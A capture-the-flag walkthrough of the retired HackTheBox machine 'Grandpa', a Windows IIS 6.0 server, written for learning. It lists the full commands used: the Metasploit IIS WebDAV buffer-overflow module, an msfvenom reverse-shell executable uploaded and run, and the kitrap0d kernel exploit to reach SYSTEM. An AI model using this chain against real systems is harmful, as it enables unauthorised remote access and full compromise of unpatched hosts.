Grandpa HackTheBox WalkThrough

This is Grandpa HackTheBox machine walkthrough and is the 9th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Grandpa HTB machine. Before starting let us know something about this machine. It is a windows OS box with IP address 10.10.10.14 and difficulty easy assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with htb VPN and make sure your connectivity with grandpa machine by pinging the IP 10.10.10.14. If all goes correct then start hacking. As usual I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-

Scanning

$ sudo nmap -sC -sV -p- -oN full_scan.nmap 10.10.10.14

Nmap revealed that only port 80 is open and IIS web server is running with version 6.0 which is a lot outdated version. Current version of IIS is 10.0. So there are more chances of available exploits. Looking the version in searchsploit (an exploit-db querying tool) listed many number of potential exploits. Among these exploits, the most trusted one is Remote Buffer Overflow because this exploit can give us remote shell very easily.

Searching Available exploit

$searchsploit IIS 6.0

When I searched this exploit in metasploit then found it with the module named exploit/windows/iis/iis_webdav_scstoragepathfromurl. Using this module I got user shell very easily without much effort. For more info about this exploit check this link.

Note: This is buffer overflow exploit. So when the machine is exploited using this exploit, the machine is needed to be reset soon if other user try to run this exploit again. So if you want to get shell again you have to reset the machine. This is because this exploit might kill the vulnerable process.

Getting User Shell

msf5 > search ScStoragePathFromUrl

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set PAYLOAD windows/meterpreter/reverse_tcp

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.10

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

meterpreter > sysinfo

You can see we have easily got a user shell. When tried to grab user flag it gave me access denied. Maybe it needs some high level privilege to give access to user.txt file. So I tried to escalate the privilege to admin then.

Privilege Escalation

To escalate the privilege to administrator we have to first find a privilege escalation vector using which we can escalate the privilege. Since we are inside the meterpreter shell so I used multi/recon/local_exploit_suggester (a post exploitation module to search for possible available kernel exploits). multi/recon/local_exploit_suggester module search for Kernel exploit whose patch is not installed in victim machine.

Finding PrivEsc Vector

meterpreter > run multi/recon/local_exploit_suggester

Local Exploit Suggeter listed 6 exploits that can be used to get admin shell. Tried each of them one by one and every exploit failed to execute by giving me access denied error. When I tried to upgrade the shell using shell command of meterpreter, shell died very soon. This may be because we don’t have a fully upgraded meterpreter shell.

I think this was the reason we could not capture user flag and got permission denied. To solve this problem I created a new meterpreter shell with this existing meterpreter shell. When I got new meterpreter shell I tried to run all the Kernel exploits again which were listed by local_exploit_suggester. After running the exploits again found two exploits that could easily gave me administrator shell. So here our PrivEsc vector is Kernel Exploit.

To create a new meterpreter shell I did the following things.

1. Created a msfvenom payload shell.exe

2. Changed the directory to C:\Windows\Temp (a public writeable directory) in Grandpa box.

3. Uploaded shell.exe to Temp folder using upload command of the meterpreter.

4. Started listener in msfconsole

5. Executed shell.exe payload using execute meterpreter command.

Upgrading Shell

Creating Payload

$msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4321 -f exe > shell.exe

Here I have used a 32-bit payload because Grandpa machine has 32-bit architecture.

Uploading & Executing

meterpreter > cd "C:\Windows\Temp"

meterpreter > upload /home/deepak/HTB/Boxes/Grandpa/shell.exe

meterpreter > execute -f shell.exe

Getting Upgraded User Shell

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LPORT 4321

msf5 exploit(multi/handler) > set LHOST 10.10.14.10

msf5 exploit(multi/handler) > exploit

So we have upgraded our meterpreter shell to fully functional meterpreter shell. Let us escalate the privilege to System. windows/local/ms14_070_tcpip_ioctl & exploit/windows/local/ms10_015_kitrap0d were two modules that gave me admin shell.

Getting Root Shell

meterpreter > background

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d

msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1

msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.10

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

meterpreter > getuid

We are NT AUTHORITY\SYSTEM now, which is the highest privilege in windows OS. Let us capture user and root flags. Since our cmd shell get died very fast so we can use search command to search for the flags while we are in meterpreter shell.

Capture User Flag

meterpreter > search -f user.txt C:\\

meterpreter > cat "c:\Documents and Settings\Harry\Desktop\user.txt"

Capture Root Flag

meterpreter > search -f root.txt C:\\

meterpreter > cat "c:\Documents and Settings\Administrator\Desktop\root.txt"

This was how I rooted Grandpa HackTheBox machine. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel free to write us at [email protected].

Next retired machine walkthrough is Granny.